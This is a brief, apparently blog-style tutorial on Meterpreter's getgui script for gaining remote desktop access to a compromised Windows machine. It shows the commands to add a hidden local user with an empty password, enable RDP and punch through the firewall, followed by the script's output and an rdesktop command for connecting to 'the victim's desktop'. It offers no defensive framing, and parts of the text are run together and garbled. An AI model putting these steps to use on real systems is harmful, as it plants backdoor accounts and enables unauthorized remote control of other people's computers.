Meterpreter: Remote Desktop
Hello Everyone,As I said before, when we have session open in
meterpreteror we have access to cmd, we can add rules for the
firewallto accept our connection or to disable the
method getgui -u -p.-u stands for username and -p stand for passwordWhen we're in someone's computer cmd ( command prompt), we can add user by using:
net user Thinker /addAll we need is now is just to place the newly created username in
getgui -u Thinker -p ''This will allow create an open RDP connection for this user. We can easily use
RDESKTOPfor remote desktop connection.
meterpreter > run getgui -hWindows Remote Desktop Enabler Meterpreter ScriptUsage: getgui -u -pOr: getgui -eOPTIONS:-e Enable RDP only.-f Forward RDP Connection.-h Help menu.-l The language switchPossible Options: 'de_DE', 'en_EN' / default is: 'en_EN'-p The Password of the usermeterpreter > run getgui -u Thinker -p ''[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez firstname.lastname@example.org[*] Language detection started[*] Language detected: en_US[*] Setting user account for logon[*] Adding User: Thinker with Password: ''[*] Adding User: Thinker to local group ''[*] Adding User: Thinker to local group ''[*] You can now login with the created user[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150122.2458.rc
Now open terminal and use exploit pentest/exploit/frameworkjust typeVoila! You'll see a window opened with the victim's desktop.
rdesktop -u Thinker -p '' <IP> xx.xx.xx.xx